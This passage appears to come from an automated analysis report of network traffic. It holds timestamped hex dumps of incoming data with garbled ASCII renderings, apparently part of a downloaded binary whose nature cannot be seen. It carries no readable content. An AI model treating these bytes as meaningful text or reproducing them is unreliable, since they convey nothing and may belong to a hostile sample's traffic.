ec 69 ef 81 7b 32 66 e1 b3 d7 38 03 4b 9a eb ab ea f4 e2 23 d6 3f 9d
                                                  Data Ascii: YCoL3-oolu4[Rbn]4SA@,IvV\LK<cJpm%:K^D0o>jBvw !:TcC]x+E(ZG5'^IJqJ730Z|9k xWZMf1J*Ur~R$(sy2{yi{2f8K#?
                                                  2021-11-29 14:53:52 UTC120INData Raw: 07 fd d6 e7 49 4f 77 b8 a0 95 aa b7 6c ec c8 93 1f 10 38 22 58 55 4a 87 9e 2f f7 fd c0 7a 75 13 0a b4 e3 d1 87 8d 0e ec e0 f4 0b e2 46 85 7b 88 88 4e 90 ab 01 0d 48 9d 16 ab 50 40 14 3c bd 26 1c 43 eb 9f ba 45 bf df 07 26 e3 60 ad cd ac ef 77 01 b1 97 f0 9f 77 89 24 70 b7 07 8c 3a 5f ca dc 81 0e e7 99 7e f2 7f d2 d0 24 fd 59 a4 c7 35 15 a0 a3 2c f4 80 e3 dc 4c 77 18 46 b7 7a 62 7d 35 dc f7 6c e1 f2 6d 70 bc 77 ea 36 73 f6 11 8a f8 eb 54 e3 a1 94 5a b4 9a 05 05 f9 64 bb b4 a6 2d e7 9f 89 6a 2b f6 b6 47 13 0d 92 f9 c9 26 57 e5 8d 29 e1 7d 38 9f 9d 8d 86 e4 69 e8 cc 72 27 84 77 89 ef 6d bb 05 39 7e ae c6 b0 23 04 8d 07 56 c9 5f 5e 31 aa ec 62 95 ff 1c 55 0f c1 d1 e3 c6 95 8f 98 70 86 d6 3a 83 24 63 39 32 f9 9a 5e cc 61 b0 e7 a5 2b ac fd 6b 88 ac bb 5f b0 ff
                                                  Data Ascii: IOwl8"XUJ/zuF{NHP@<&CE&`ww$p:_~$Y5,LwFzb}5lmpw6sTZd-j+G&W)}8ir'wm9~#V_^1bUp:$c92^a+k_
                                                  2021-11-29 14:53:52 UTC122INData Raw: ab bf 37 75 ec ba 7b 2c 14 4b 8a e8 a4 00 dd 6d 2a a8 a6 b5 1d 8c c6 f3 b5 0c 8f a4 92 21 69 b8 54 96 a9 06 c8 d2 46 66 d7 a8 e1 0c f4 2e cd 60 d9 ec 8e a1 e7 d1 6b ae f0 26 0c b9 7b d9 eb 8b e9 37 7b 61 48 a4 d5 f8 5b 9f 39 27 3a 4b f2 2a 18 4f ce 87 cf 11 85 ee 01 4d e5 52 8c bd 9d 85 2c fb 1f 35 f8 5d c1 26 a7 9c 90 34 b4 47 ef 16 24 6d 81 a8 4a 75 a5 be a4 ce 91 4c 39 46 01 9e 96 db c5 d6 2c 12 43 5a 2a 86 99 f2 f3 88 27 3e 72 88 35 ad 23 53 e1 55 83 4a 4e ca 33 60 c4 72 c4 23 6b d9 ec fe 62 2b b7 d8 e3 68 e2 72 cc 45 09 4d 05 4b a9 cb 82 fb 28 c3 8a 8e c1 eb 6e 31 d9 ef 32 b3 41 a8 49 e5 a2 ea b7 3d 2d 03 38 d7 fb 70 ac b6 10 09 7d e3 df b5 e9 41 b1 0c ea 76 94 11 d0 49 37 20 66 7b ad 5a 68 4e af e5 98 3d 7c 78 4d 55 6b 1e 7a e6 7e a4 5c 02 13 70 88
                                                  Data Ascii: 7u{,Km*!iTFf.`k&{7{aH[9':K*OMR,5]&4G$mJuL9F,CZ*'>r5#SUJN3`r#kb+hrEMK(n12AI=-8p}AvI7 f{ZhN=|xMUkz~\p
                                                  2021-11-29 14:53:52 UTC123INData Raw: 3f 20 be d7 5c cc 61 cc 03 b5 37 be c6 4d 9d a2 c3 05 3c f8 ca 9b 89 e6 94 ff 00 26 f7 b9 b5 d9 a7 fe c7 48 c9 3f ae bd 04 3d 67 e5 55 8c 42 7a d1 0b 5a 1e 12 33 3f 2d c6 e1 03 15 4f f9 16 12 2b be 11 ab b8 6d 61 6c a8 4b ca fd 31 5d f3 de 71 70 e4 92 21 3c fe 3e b3 7f 91 46 52 15 0a d3 26 8b 63 84 57 d8 4d 5d b4 bd f2 8f 88 bd b9 8a 14 f5 15 e9 fb 64 a1 f8 5a d3 88 01 ab c5 9b 65 32 e6 c2 0f 8f f7 50 70 5e d1 44 0b b2 b5 88 2a 44 b8 23 69 68 08 28 82 49 26 a1 16 47 ab 14 d0 48 61 15 b2 03 2b 74 77 57 ea 75 db 2b d3 83 d9 e6 d8 2b 10 5c 16 5a c3 95 5d 7e ce 15 85 eb 31 88 0a 61 49 4a 71 d2 09 f8 87 b5 02 85 e6 8b 37 39 a5 93 43 32 fc 96 44 63 40 b5 7c c7 a1 1a 1d 58 34 65 82 39 96 12 02 f5 41 94 b5 92 b1 67 d2 e5 97 3a af 68 e3 b5 7d 11 65 f3 f2 a9 9d be
                                                  Data Ascii: ? \a7M<&H?=gUBzZ3?-O+malK1]qp!<>FR&cWM]dZe2Pp^D*D#ih(I&GHa+twWu++\Z]~1aIJq79C2Dc@|X4e9Ag:h}e
                                                  2021-11-29 14:53:52 UTC124INData Raw: 35 a4 8a 62 3e 78 03 22 5b 74 05 43 f1 6d 85 4f 1d e9 8e 89 20 15 94 04 c5 9d b1 55 16 18 8b 33 a0 f2 3f 38 12 f6 b7 f1 da 06 b5 2d 1a 9b e7 43 5e 4d b8 aa bd 98 9f 6c e7 15 7b 60 6d 39 20 74 71 5b 79 99 11 2d fc ca 76 71 0f 08 b7 67 5f 33 0f 0f ec f2 7b 22 99 c6 85 68 97 a2 3e b5 ae 0b 76 1f b8 16 af 59 25 e5 46 c2 21 0f 53 f8 f0 55 b5 be db 29 a4 07 62 a7 c3 ab 34 4e 19 4e 96 fb 8a 7e 8c c1 76 39 ba 7d 92 5e ca c3 90 10 8d 07 6b da 53 fe 88 20 eb de de 46 34 14 b0 b3 2e de 58 62 dd 46 5b 32 38 35 7d 74 51 f5 33 f5 66 fa eb 6d a6 95 65 14 31 69 73 3a cd fa ef ce 40 c8 38 f8 b4 9e 0d 2f ab e5 ba b2 b4 2d 57 9f 89 6a 7e 9c b5 47 1d 19 98 ef 9a 8d 52 e5 8f 3d 17 fe 39 9f 98 b1 7f f2 41 41 ce 77 a3 1b 20 0a ee 6b a9 2f d3 07 28 cd 98 ce 2e d5 0f 7e 71 22 db
                                                  Data Ascii: 5b>x"[tCmO U3?8-C^Ml{`m9 tq[y-vqg_3{"h>vY%F!SU)b4NN~v9}^kS F4.XbF[285}tQ3fme1is:@8/-Wj~GR=9AAw k/(.~q"
                                                  2021-11-29 14:53:52 UTC125INData Raw: 70 84 94 6f e3 91 80 17 b5 4a c4 b1 55 8b 4f a9 86 18 fa bf 0a ac 9a 54 be e5 4a 07 37 43 10 6f 34 77 1a 26 69 7b 16 67 75 62 fb ad a2 ab 43 ca ae 7c 22 1c 77 84 f0 97 d3 de 41 25 fc 6f cb 84 87 cb eb b8 81 aa 98 8e 18 7d 59 1e a5 be 3f e0 f8 6d 65 fd cc b7 b1 f5 2e c3 57 e1 76 ab 86 d2 0e 75 a7 ef 61 18 a6 44 f4 f8 9c f0 00 e7 1e fd b6 c4 fa 4d bd c5 03 17 4d bb c2 13 50 ac 8b c9 26 b6 ff 16 4b de 1b ec da 9d a9 21 dc 63 50 22 8f d5 09 ab 80 8f 4a ba 70 d5 ea 25 47 bb db 30 c4 2b bf a0 db a7 76 1d 6b 0d a7 91 c4 cd a4 22 19 74 7b d6 87 b3 d1 a5 57 bf 3f 72 93 27 b3 ae 76 dd 4d ba 4a bd eb 91 43 d5 7f b4 d5 42 f4 e8 e8 0b d0 db a6 70 06 1e 77 d3 4d 8b 07 f9 46 8f de e3 25 b1 c3 8c 9d d0 fe 66 0f cc ef 25 8e 30 c8 2e e5 8e c0 b9 3f d8 da 14 d8 db 79 cc 47
                                                  Data Ascii: poJUOTJ7Co4w&i{gubC|"wA%o}Y?me.WvuaDMMP&K!cP"Jp%G0+vk"t{W?r'vMJCBpwMF%f%0.?yG
                                                  2021-11-29 14:53:52 UTC127INData Raw: ae 5d 8a c5 01 d3 b4 d0 7c aa d3 ae 50 23 a0 03 58 64 69 7e b7 84 f1 73 91 c3 19 d0 0c c7 fd 9f 35 0b 8e 98 75 8d f5 b4 8e aa 6d 1f 27 e6 26 d0 ce 6b a3 e4 9c 1a ba d5 45 a6 c6 c3 d0 3c f8 ca 95 be 54 ad d0 0e 06 fb 8a e6 6a a7 fe c1 40 f1 03 bc b5 6d 3f 0f 9b ca 9c 52 6f c2 1a ed 3e 3f 3b 31 1c fd c1 93 3f a3 fb 0a 30 69 98 13 ad 94 16 0f e4 a2 63 e3 e7 0b c1 fe dd 7d 56 fd 80 ed a2 fc 34 dc 44 bb 6b 56 04 1c fa 23 df f8 85 51 da 43 76 41 8c de 81 a4 7c 8d 8f 9f c0 15 e9 e8 5f 98 d2 62 d5 a2 65 0b 5c 8b 6f 21 2f ed 9f bb d0 4e 41 7f 98 9a 52 4f a4 9d 22 9b 83 1b 7a 7d 1f 14 66 80 80 4b eb bc 4b 2f 60 6d 0d 2f 94 1c 16 54 d8 55 b9 75 cc 03 f5 81 d9 e0 ac 41 6e c5 05 5a c7 8a 79 e4 eb 39 8b cd 2e b6 b7 d1 4b 4a 1c c4 21 d5 8f b7 04 af 83 f5 ae 38 bf 97 5c
                                                  Data Ascii: ]|P#Xdi~s5um'&kE<Tj@m?Ro>?;1?0ic}V4DkV#QCvA|_be\o!/NARO"z}fKK/`m/TUuAnZy9.KJ!8\
                                                  2021-11-29 14:53:52 UTC128INData Raw: ca f0 46 3e 7b 9b b9 c2 91 a1 86 a4 46 ff 39 cb d5 4b c1 67 14 23 19 f2 ba b5 e9 43 b9 05 a1 51 b9 14 99 aa 50 00 fa 68 c2 8b 75 5e 8d a7 64 3c 7a 54 34 24 ed 00 69 f5 61 d2 d1 38 2e 80 af 3f 7a b5 ae d0 9f 4f 5b 73 35 89 31 a4 a6 64 46 8b f3 ca 8b c4 6e 2b 0a e7 d9 c1 5c 34 45 03 ae bd 92 a8 63 ce 38 73 1d 16 12 4a 0e eb 4e 87 9c 18 ba 67 e5 5d 53 04 15 dd c9 56 4a 8f 0e f7 de 54 22 e2 40 ae 06 ed 13 67 b7 aa 1e 61 fa 9c 3b a4 7c 2c 8d 1d 7e 24 0f 57 e5 ae fd 99 bc df 07 63 6b 1c 34 c6 bf ce 50 64 2a b2 dd 82 74 be a8 52 5f 09 00 10 40 c1 ef bf 10 f6 83 40 b4 29 4f d1 22 ef cb cf 5d 10 39 bb 91 27 b0 03 10 d8 46 5f 2f 56 9f 51 76 55 db f4 9d 18 69 ef 79 5c 8b 1e 70 15 48 75 30 95 95 ca 48 f2 b5 bc e5 9c b7 0d 2d d6 4b d5 cc 29 04 0f 99 96 0e 99 3a 99 48
                                                  Data Ascii: F>{F9Kg#CQPhu^d<zT4$ia8.?zO[s51dFn+\4Ec8sJNg]SVJT"@ga;|,~$Wck4Pd*tR_@@)O"]9'F_/VQvUiy\pHu0H-K):H
                                                  2021-11-29 14:53:52 UTC129INData Raw: 8f 97 61 53 62 31 d1 09 fe a7 35 7c 1c e8 8b 33 19 2e 93 43 33 7d 83 60 72 3c 94 ed c7 a4 1b 3d 30 31 6f 80 35 d1 de 01 f5 4d a1 68 df 20 64 c5 8e bf a9 af 62 e9 29 70 a0 74 d5 d8 13 fb bf 0e 90 7d 76 93 ee 74 33 05 71 0f 65 36 d8 66 bf 6e 51 48 39 7f 63 fb a9 25 14 4b f6 83 7a ac 03 4b 9b df c0 f9 dc 41 3e fe 18 b7 1d 80 e1 6d d8 82 8e b5 81 1e f7 46 55 ba 29 32 e0 eb 4b 43 43 ae c9 28 d4 a8 c0 48 e8 f2 a6 86 dc 28 6c 84 72 47 9e ab 6c dd da 09 f6 2a 85 fa 41 9a d5 d8 72 22 5f 26 3a 61 13 da 19 4f df bc ef 0c 9b fb 3c cf 8a dc 93 43 98 89 b3 c3 68 ca 9d 87 f3 3e 92 ab 06 25 a3 58 d8 67 22 41 91 ae 66 70 28 bf a2 ee 29 92 a1 47 01 85 ae 5f d2 d6 3d 9f 79 7b c5 a1 95 6c cb 29 26 1e e2 90 38 be 2e 7b dd 40 9c 53 9a 49 61 da d4 7f af ff f2 d9 ea e8 97 df 98
                                                  Data Ascii: aSb15|3.C3}`r<=01o5Mh db)pt}vt3qe6fnQH9c%KzKA>mFU)2KCC(H(lrGl*Ar"_&:aO<Ch>%Xg"Afp()G_=y{l)&8.{@SIa
                                                  2021-11-29 14:53:52 UTC130INData Raw: ac ba f4 52 bd b5 10 90 ab 30 52 fb 67 a7 0d fe 1d 6a 4c b8 54 12 60 6d 0d 33 94 23 8c 74 77 57 99 37 d3 2b d8 9c d0 ce ab 29 10 5a 2e dc bd 0c 46 7e ca 34 2d eb 31 88 0d 44 64 58 3a f3 a1 f8 8d b7 22 ce e1 8b 37 26 af bb 6e 31 e7 a0 67 e1 64 2d 7d c7 a0 3b b4 49 36 6f 1a 0a d4 e2 25 d5 e2 8b ea a1 99 3e cd 8a 9f 20 87 4f eb b3 53 a7 e7 8d 61 80 fb bb 2e 1a 00 71 93 74 49 36 39 55 2f c9 1c 5a 18 06 0f 59 4c 19 f6 4b d6 ab bf 37 4c 65 db c3 3e 03 4f bb 54 bf fe dc db 06 fb 24 93 3d 2d cb ef a6 3b eb bd 85 3e 7d 6e 78 b8 b3 11 e7 78 13 fa d6 ae cd 08 58 2e c7 48 72 c9 a3 ba f8 08 c6 ae f0 39 27 c6 64 d9 fa 85 de 07 87 60 62 9d 42 80 cb b6 5f 22 1a ec 9d dd 19 d5 ed b9 d0 28 bb 50 16 4d f4 65 fd 4b 9c a9 3a cc 40 e7 05 a2 d8 05 36 f5 09 24 a3 5c d8 46 25 41
                                                  Data Ascii: R0RgjLT`m3#twW7+)Z.F~4-1DdX:"7&n1gd-};I6o%> OSa.qtI69U/ZYLK7Le>OT$=-;>}nxxX.Hr9'd`bB_"(PMeK:@6$\F%A
                                                  2021-11-29 14:53:52 UTC131INData Raw: 5f ca e7 0f 18 f6 85 75 f9 7f fb d2 22 ed fe 25 b9 ac 15 b4 b3 18 12 23 e3 dc dc 7a 1d 51 91 5c ba 55 dd de d7 a6 fa ee 79 47 b6 5b c7 32 65 7d 3c 0c 86 73 41 f7 b1 9c 36 b4 9a 0f b7 f5 4c a9 94 90 ca 0f 9d 89 40 e1 15 b4 47 06 3e a6 c0 e3 0e 55 cf 0d 41 f5 7b 38 9b bc 49 92 f0 41 d1 e9 5f 3f 8a 7d 5c ef 6b ad 0d d5 77 ae cc 87 e9 2e a0 0f 7e 7d 75 d8 45 1f f0 73 8d cb e5 d2 0c c1 4d d0 66 80 a9 b8 a0 92 c2 2e 8b a0 68 39 38 ce 23 76 e1 69 a3 fb 9e b1 c6 4c 42 8c a8 9d 9b 3d f8 ce 10 a3 e3 9a db 20 f2 e4 b2 c6 db e9 f5 c1 5b c6 08 96 98 69 15 63 cf d5 e3 cb 6a dd 27 57 c8 12 35 17 99 e1 cc 17 1b 83 28 16 18 44 ba 61 a0 be 7c 6e 5a 8b 4e e5 f8 37 71 5d 8e ea 71 e2 be ed ea fe 34 dc c3 b6 6b 46 22 3a 04 49 a1 61 a4 c8 d5 5c 4d c4 8c db a2 80 63 b0 85 ba bc
                                                  Data Ascii: _u"%#zQ\UyG[2e}<sA6L@G>UA{8IA_?}\kw.~}uEsMf.h98#viLB= [icj'W5(Da|nZN7q]q4kF":Ia\Mc
                                                  2021-11-29 14:53:52 UTC132INData Raw: 9c a9 bf e6 45 db 21 82 2a 2f b4 8b b0 23 ad 58 f8 f5 0d 6c 93 b9 48 77 a8 c1 3d c5 ab e8 18 b3 01 81 8e 52 f7 fb 2c 23 7c a3 d4 87 b5 db c6 27 26 3e 68 bf 15 bc 34 55 da c0 e2 cc b1 cb 1b 63 23 7f ab df f0 fc c7 f9 2b da 43 d8 e9 07 3e 62 c2 43 11 38 fc 64 ab c1 eb 2f ab bd 15 9c cf f0 6e d5 ce ef 23 3e 7b 9b a6 c2 ae 33 a6 30 42 df 2c d9 fd 66 d9 4f 3f 0b 77 8a 09 36 97 de a7 63 3f 54 6c 1b bf b5 ac 05 4d 7d e4 ab 92 4e a5 8a 46 25 72 7e 5e 43 5c 2c 6b f1 78 9f c9 63 9a 8f 89 24 3d 6c 04 d4 9f d5 65 76 09 ad 11 5b 8c 0a 38 32 ee c4 8f db 1b 99 02 c8 d6 e1 69 de 1b 35 ab bd 96 97 96 e6 15 71 87 35 15 31 56 52 b5 87 98 07 f3 de ce 70 5d 3f 22 99 eb e8 48 a5 88 92 6f 78 20 e6 66 7f 68 93 8a fc 92 83 13 2d 40 42 16 ab 5a 13 cd 33 bd 20 10 5a d2 a6 d7 b4 b8
                                                  Data Ascii: E!*/#XlHw=R,#|'&>h4Uc#+C>bC8d/n#>{30B,fO?w6c?TlM}NF%r~^C\,kxc$=lev[82i5q51VRp]?"Hox fh-@BZ3 Z
                                                  2021-11-29 14:53:52 UTC134INData Raw: 01 d1 49 a1 fb a1 7c cf 7a 6d c0 a8 f3 8f a2 79 a6 af 3c dc 3d c4 f3 77 b3 fa e4 ad 11 0a 75 c1 aa 73 24 30 d1 9f bb d0 53 41 40 b8 bb f4 4d 84 bf 2d 92 ab 29 59 55 34 3c 0c f8 33 cc 95 21 55 12 fe 68 3d 20 b2 03 b1 51 5a 45 9f 55 c6 2a d8 83 f9 a5 96 2b 10 43 0d 72 ee 97 47 78 e4 92 fb 72 30 88 93 41 57 4b 1c d3 93 dd a0 a5 24 a5 f7 8a 37 39 9f df 53 33 e7 b9 5e 4b 37 b6 7c c1 8e 99 63 d0 37 6f 84 0f e6 f2 03 f5 d1 ae c7 b0 9f 45 da 8b 9f 3b 8f 3d f9 b3 55 96 4d de fa 81 fd 95 88 ce 99 70 93 ea 4c 3b 29 73 0f f9 39 77 0a 00 4f 71 4d 19 ec 43 9f b9 bf 31 79 e8 8d 77 3d 03 4d b1 7d c1 67 dd 41 27 f6 14 b4 1d 86 51 ca 8b 0a a9 95 a4 3f 63 46 75 c9 a3 17 cd e4 45 4e d5 ae cf 02 72 50 5e 49 e8 e8 ae 89 df 28 6a 34 d5 14 15 8c 4c fb fb 9c f6 0a fe 70 64 b7 db
                                                  Data Ascii: I|zmy<=wus$0SA@M-)YU4<3!Uh= QZEU*+CrGxr0AWK$79S3^K7|c7oE;=UMpL;)s9wOqMC1yw=M}gA'Q?cFuENrP^I(j4Lpd
                                                  2021-11-29 14:53:52 UTC135INData Raw: ae 07 21 e6 c7 8f aa 5a 37 c7 7f bc 20 0f cd df a6 c7 92 9e 9d 00 49 05 42 b7 d5 bf ca 50 1c 98 ba f2 8d 54 8b 45 0c 2e 0c 00 14 7f 89 c6 92 12 6c a0 47 c8 71 f6 93 23 eb d4 83 ea 27 14 b4 a8 1c f4 0e e1 dc 40 75 b6 3d 2e 7d 74 51 fd 9a f6 66 f0 74 5c 75 86 55 ca 74 64 7b 16 aa a9 f8 40 f7 aa a3 d1 99 98 0f 2b fa e7 c5 2b b1 05 0b bd cc 61 03 1f 2e 62 34 0e a8 cd a4 0f 53 e5 ab 4f 7e 7a 38 80 b8 b1 bf f2 41 4d e6 f4 53 35 5c 8c eb 4b eb 2c d1 7c 34 e9 b5 d8 20 ad 4b 7f 7b 5f 7e af 94 f1 73 96 c8 1c ff 0e c1 d1 df cd ec 16 99 71 96 e2 69 aa 87 63 a3 1d fc 14 78 ec 2c a2 fd b4 17 0f c7 43 8c b3 99 61 10 fa ce 8c ac 48 f6 64 01 20 e0 92 8e fa a5 fe 5b 7e f4 3c 98 95 23 14 65 e5 73 46 40 6b dd 3c 78 33 3f 37 17 05 ee 67 7b a4 a2 fb 12 38 0d 9b 13 ab 24 59 5c
                                                  Data Ascii: !Z7 IBPTE.lGq#'@u=.}tQft\uUtd{@++a.b4SO~z8AMS5\K,|4 K{_~sqicx,CaHd [~<#esF@k<x3?7g{8$Y\
                                                  2021-11-29 14:53:52 UTC136INData Raw: 8b b6 29 6a ae d0 4e 12 aa 6c c7 d2 b1 f4 2a 83 4a e6 c9 5d ff 52 b3 7f 4f 3b 41 9d 47 3c 62 d9 b2 e2 67 9a fd 16 6d 8b 50 92 43 82 81 08 c1 68 cc 2d 20 a0 b6 b5 8b 94 05 c9 59 f8 e8 bf 64 bc a8 68 7d 40 be a4 c4 8b 6b 2d 46 01 9b a6 e5 d0 d6 3b 2f de 28 4d 86 b5 ff eb 42 27 3e 72 0d 1d 93 25 75 d0 29 9d 55 b0 eb 94 56 d5 7f b1 f7 47 db ea ee 27 78 cb 41 e8 07 1a 53 a0 42 11 22 4e 6c 84 d0 cb 25 45 c2 8c 9d ef 7b 5b 22 ce f4 0b 89 5c b6 b1 ce 08 ba 3f 31 42 fb 19 ba fc 66 c3 fd 37 24 65 aa 03 d9 e8 47 a6 43 af 61 94 1b a0 be 1e 0d 62 6c c4 a1 ec 30 3c 8b 66 38 5c 10 5f 5a 74 9b 4c dc 6c 93 6b 73 02 8e 89 00 82 80 04 d4 80 43 68 76 1a 8b 37 88 0a 74 a1 13 f2 ce af b4 07 b1 2f 50 f3 ca 51 7a 45 c3 ab bd 92 97 c7 f3 15 71 02 30 10 0d 72 72 49 ad 1e 79 4a fc
                                                  Data Ascii: )jNl*J]RO;AG<bgmPCh- Ydh}@k-F;/(MB'>r%u)UVG'xASB"Nl%E{["\?1Bf7$eGCabl0<f8\_ZtLlksChv7t/PQzEq0rrIyJ
                                                  2021-11-29 14:53:52 UTC138INData Raw: 94 13 35 17 99 e1 cc 17 1b 83 74 17 18 44 ba a7 bc be 7c 6e 6e 8b 4e e5 f8 37 71 5d 8e ea 71 e2 be ed ae ff 34 dc c3 b6 6b 46 22 3a 40 48 a1 61 a4 96 c9 5c 4d c4 a0 db a2 80 63 b0 85 ba bc 8c e8 f1 73 95 41 63 d3 88 91 50 e8 98 49 05 a1 d0 05 9e dd 91 70 60 a4 a5 fa 65 89 9f 3d 94 81 b0 06 e4 18 3e 08 de 8b 4b eb b8 ce 37 d7 5a 06 01 20 02 2b 74 57 89 ae 75 db 34 d4 ab f4 e4 86 2d 3a de 7a c3 c2 95 43 5e 5d 15 85 eb ab ad ba 70 6f 6a 8f d2 09 f8 ad 5d 15 85 e9 92 1f 14 bd 93 45 19 65 d8 d4 62 1a b0 5c 53 a5 1b 1d d3 13 42 91 09 d9 67 02 f5 4b ab 07 b6 b9 65 de a2 b2 39 af 64 c3 31 2b 14 64 f3 fc a1 6e be 0e b0 9a 54 be ff 4a 3b bd 72 0f 63 3c a8 0f 26 6f 4c 64 34 ee 63 fd 83 3d 4f ff e6 a5 5e 1f 95 4a 9b ff 25 db f1 50 05 f6 a3 b4 1d 86 eb 16 b1 1b 8f af
                                                  Data Ascii: 5tD|nnN7q]q4kF":@Ha\McsAcPIp`e=>K7Z +tWu4-:zC^]poj]Eeb\SBgKe9d1+dnTJ;rc<&oLd4c=O^J%P
                                                  2021-11-29 14:53:52 UTC139INData Raw: aa b9 b2 01 6d e6 15 eb 38 3d 29 06 50 c4 4e 87 98 27 8c e4 c0 70 40 0a 27 b6 e9 ee 64 0d 70 75 f7 79 24 c2 f1 85 68 93 10 43 9a bf 27 2b d7 b8 16 ab 7a 55 fe 3d bd 37 27 7a f8 8b d3 9e 3c a1 98 48 05 66 8d 7f be ca 4f 95 95 ba e1 ab 72 19 c2 72 b7 2d 67 09 5f ca db ba 3f f4 85 6c f0 d5 a8 49 23 eb d0 83 7e 34 14 b4 2d 1d f1 32 c5 fc ff 5e 30 43 97 11 6d 55 dd c3 df 4b f2 ee 7f 72 16 0d 73 31 65 7f 36 30 f9 ea 40 6d 90 91 e8 92 ba b5 2c d0 61 9b c6 a9 05 0f 81 a1 4d 01 1f b2 6d 9b 62 17 ec e1 0a 73 5e 8a 3f 6c e0 1d b2 8d bf b2 4b 40 4b cc 52 57 b5 5d 8c f2 43 80 2f d1 7a 84 4a e6 53 07 8d 09 5e c7 5e 5e 3b 1c d4 5e 9b cd 14 6e 0d c1 d7 d5 ca 8b 8f 98 6e 8a ea 03 a9 87 65 13 ba af 9f 5f cc 6f 83 40 b5 37 b8 4f 66 a1 bd 9b 69 80 f9 ce 8a a6 57 91 fd 00 3d
                                                  Data Ascii: m8=)PN'p@'dpuy$hC'+zU=7'z<HfOrr-g_?lI#~4-2^0CmUKrs1e60@m,aMmbs^?lK@KRW]C/zJS^^^;^nne_o@7OfiW=
                                                  2021-11-29 14:53:52 UTC140INData Raw: 07 6b 46 fe bf fe 46 64 0e c7 13 95 c0 87 cb ef 86 31 94 b5 85 26 4b 6b 57 ba b5 3d 4b 84 f4 62 d7 aa e9 f6 f5 2e c7 d2 cd c1 9c 8d fe f6 6b ae f0 19 2b b1 6c d9 e5 97 de 07 87 60 62 9d 42 80 cb b6 5f 22 1a 9e 9c dd 19 d5 ed b9 d0 28 bb 22 17 4d f4 65 a5 58 9c a9 3a d3 40 e7 05 a2 d8 05 32 f5 09 24 a3 5c d8 08 24 41 91 23 6b 70 38 99 84 24 aa ec 38 66 46 9a 8e c8 cd f5 15 28 5e 56 d2 ad 37 85 52 28 26 3a 52 76 39 be 34 c9 d5 6f 8d 73 90 2a 1e 43 d5 5f c1 c4 6a d9 f3 c0 20 f8 b5 de c3 85 60 ea cd 43 15 02 36 48 a9 c1 77 20 04 d2 aa bd 2d f5 4e 22 ee 82 38 a4 5e ab 9f c9 8c c4 a0 1a c4 81 a0 d6 fd 62 e3 84 13 09 77 16 06 99 fb 61 86 80 3a 74 94 3b cb ae 36 20 7f 79 ea a6 68 4e a3 a0 e0 42 e5 7f 5e 5e 54 e5 68 f1 7e 2f 6e 30 11 a8 a9 c4 1c 95 04 f4 16 54 40
                                                  Data Ascii: kFFd1&KkW=Kb.k+l`bB_"("MeX:@2$\$A#kp8$8fF(^V7R(&:Rv94os*C_j `C6Hw -N"8^bwa:t;6 yhNB^^Th~/n0T@
                                                  2021-11-29 14:53:52 UTC141INData Raw: f9 94 33 ba d5 43 16 89 90 5b 1b d8 ca 88 86 ce a8 1f 1c 20 e4 ad cd d3 88 fc c1 5d f3 ac c0 2c 6a 15 61 c5 56 9f 52 6b 47 06 5a 0a 34 15 12 01 c4 e1 25 d0 bf fb 16 03 6c b7 11 ab b8 56 f7 03 3a 62 e7 fc 11 5d d9 f0 73 ea c7 97 df 18 de 32 de 59 93 66 a6 18 1a d0 56 ad 49 a9 53 de 5a 67 5d d7 6a 8e 82 67 96 a8 3e c2 15 73 d4 5a a7 f6 42 d4 8a 0b 75 e5 74 73 25 30 ce 13 b6 d0 43 67 66 8e 38 8a d4 a5 9d 39 b2 a3 34 78 7d 83 1b 21 ef 3f 6a e3 ba 54 12 da 5c 3d 21 b2 1d 03 59 75 57 bf 5f 5d 55 41 82 d9 e2 a6 22 12 5c 04 c0 e6 b8 55 58 ee 1d 87 eb 31 a8 8b 7c 49 4a 03 d8 21 d5 8f b7 04 af 6f f5 ae 38 bf 97 63 39 e5 a6 4d f9 3f 99 6e e1 84 11 1f 49 36 4f a7 32 f9 f3 1c f9 63 a6 e8 a1 bf 4f 43 f4 06 3a af 66 c9 b8 57 8d 65 69 dd ac e9 99 2e bb 02 71 93 ce 5f 06
                                                  Data Ascii: 3C[ ],jaVRkGZ4%lV:b]s2YfVISZg]jg>sZButs%0Cgf894x}!?jT\=!YuW_]UA"\UX1|IJ!o8c9M?nI6O2cOC:fWei.q_
                                                  2021-11-29 14:53:52 UTC143INData Raw: 58 74 07 43 77 00 2c 4a 1d 07 ae a2 22 1d 95 9e f1 b2 5d 66 7b 33 89 31 a2 ac 30 18 12 f2 d5 d7 f3 2b b3 2f cc fc 65 3d c5 64 ac ae 9d be b5 6c e6 8f 54 30 01 1e 00 5c 70 4f 87 b8 95 f3 fd c0 6b 75 0f 08 b4 ef c2 c8 f1 97 ed f6 7d 00 cf 44 84 68 09 af 4b a5 88 21 26 62 b9 16 8b cd 13 e7 3d a2 2d 27 7a f8 8b d3 9e 38 a1 98 48 05 66 8d e9 bd ca 4f 95 95 ba e2 ab 72 8f c1 72 b7 2d a4 30 5f ca d8 9f 3a db 87 6a dc 7d 50 ae bb ea d4 a7 e7 1a 16 b4 b7 a2 f9 0e f1 fa 66 70 32 43 b7 5c c5 75 dd de e8 6b d8 c3 7b 58 92 59 6c 4e fc 7a 16 8e d8 da 42 f7 b5 26 dc 99 88 29 0d e0 63 bb b2 90 bb 2f 9d 89 7f 0e 37 99 45 19 1a a4 6b 9f 97 52 e5 8f 1f 5d 78 38 9f 06 bc bf e2 67 6b fd 70 2d ac 7d 47 cf 6b ad 32 da 54 83 ce 98 cc 2c 0f 73 e7 7a 5f 5a 1b b4 f3 73 89 71 11 ff
                                                  Data Ascii: XtCw,J"]f{310+/e=dlT0\pOku}DhK!&b=-'z8HfOrr-0_:j}Pfp2C\uk{XYlNzB&)c/7EkR]x8gkp-}Gk2T,sz_Zsq
                                                  2021-11-29 14:53:52 UTC144INData Raw: 8d 62 e9 ac 5e a5 48 f1 f8 87 d1 39 70 29 01 71 97 ce 3e 19 28 73 95 46 31 48 3e 06 3d 53 4c 19 cc 65 d8 a9 bf 2e 7c cf 88 58 3f 05 61 1d 81 26 ff dc 45 03 85 37 b5 1d 1c ee c2 b4 3d af e6 87 3e 63 66 75 99 b3 17 d2 e2 45 4e d5 ae cf 02 72 50 5e 49 e8 e8 ae ff dc 28 6a 34 d5 14 15 8c 4c 8d f8 9c f6 0a bd 43 64 b7 db ea 7a 9a 5d 26 3c 6b 1f a3 80 4e c8 90 e2 5b 99 fd 16 d7 d1 68 83 65 bc fc 27 c3 68 ea 4b 81 de 2f aa a3 bd 27 a3 5e d2 6e 5b d8 90 b9 4a 7d 7c bd a4 c4 31 c9 15 54 27 a1 d8 ca d2 d6 1d 51 7f 56 d4 98 ad d3 e6 2b 26 38 58 11 46 27 35 53 f4 62 cb 57 b0 cb 85 66 f8 6d 8d 